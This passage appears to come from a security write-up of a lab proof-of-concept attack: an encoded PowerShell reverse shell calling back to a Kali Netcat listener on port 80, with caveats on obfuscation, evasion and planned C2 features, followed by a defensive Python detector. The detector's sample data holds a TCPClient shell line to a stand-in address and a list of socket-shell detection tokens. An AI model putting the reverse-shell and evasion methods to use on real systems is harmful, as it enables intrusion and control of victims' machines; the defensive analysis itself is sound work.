A reverse TCP shell in the form of an encoded PowerShell command is launched. This shell attempts to connect to the attacker’s Kali Linux machine at the “public” IP address 126.96.36.199 on port 80. Port 80 is used because perimeter firewalls in enterprise configurations allow traffic on it; it also has the added benefit that the shell is less likely to be noticed among the regular HTTP traffic going in and out of the network.
On the Kali attacker machine, Netcat is configured as a verbose listener on port 80 and waits for a connection from the target machine.
A successful connection provides a reverse shell to the compromised machine and control of the target is established:
Caveats for the payload:
- To make the attack easier to understand, none of the strings or source code were obfuscated, nor were any of the EXE files packed. In our experience with real attacks, heavy obfuscation (such as Invoke-Obfuscation), fileless processes and packers would be used to prevent detection and analysis, among many other techniques.
- The encryption method uses a hard-coded IV, which would allow easy deciphering of the encrypted files. The intent of this project is a proof of concept (POC), not to create advanced encryption methods that prevent decryption.
- Additional functions are currently under development, including detection of whether the processes are running on a virtual machine, support for staged updates and modification of C2s, and polymorphic file attributes.
- Cloud detections for Windows Defender were enabled on this machine; however, the lab environment had no Internet connection to the outside world. With an active Internet connection, Windows Defender might have detected and stopped some of these processes based on behavioral analysis, necessitating additional steps to prevent detection.
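For the defender's side of the encoded-PowerShell reverse shell described at the start of this section (and the behavioral-detection caveat in the last point), here is an added Python example that is not code from the original project: it decodes a PowerShell -EncodedCommand argument (base64 over UTF-16LE), looks for socket-related tokens in the decoded script, and correlates that process with an outbound connection on port 80 or 443 from the same PID. The event layout, PIDs, the 198.51.100.10 address and the encoded script are constructed for the example.

```python
import base64
import re

# Constructed sample events in a Sysmon-like shape (Event ID 1 = process create,
# Event ID 3 = network connect). Hypothetical values, not taken from the page.
_SAMPLE_SCRIPT = "$c = New-Object System.Net.Sockets.TCPClient('198.51.100.10',80)"
_SAMPLE_B64 = base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode()
_BENIGN_B64 = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _SAMPLE_B64},
    {"id": 3, "pid": 4120, "image": "powershell.exe", "dst_port": 80},
    {"id": 1, "pid": 5001, "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + _BENIGN_B64},
    {"id": 3, "pid": 6002, "image": "chrome.exe", "dst_port": 80},
]

# PowerShell accepts abbreviated forms of -EncodedCommand; match the common ones.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
SOCKET_TOKENS = ("net.sockets.tcpclient", ".getstream(", "invoke-expression", "iex ")
WEB_PORTS = {80, 443}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def socket_indicators(script):
    """Tokens in a decoded script that are typical of a socket-based shell."""
    low = script.lower()
    return [t for t in SOCKET_TOKENS if t in low]

def correlate(events):
    """Alert on a powershell PID that ran an encoded command with socket indicators
    and then opened an outbound connection on a web port (80/443)."""
    suspects = {}
    for ev in events:
        if ev["id"] == 1 and ev["image"].lower().endswith("powershell.exe"):
            script = decode_encoded_command(ev.get("cmdline", ""))
            hits = socket_indicators(script) if script else []
            if hits:
                suspects[ev["pid"]] = {"indicators": hits, "connected": False}
    for ev in events:
        if ev["id"] == 3 and ev["pid"] in suspects and ev.get("dst_port") in WEB_PORTS:
            suspects[ev["pid"]]["connected"] = True
    return {pid: s for pid, s in suspects.items() if s["connected"]}
```

The benign encoded `Get-Date` process and the browser's port-80 connection do not alert, which is the point of requiring both the decoded-script indicator and the network event on the same PID.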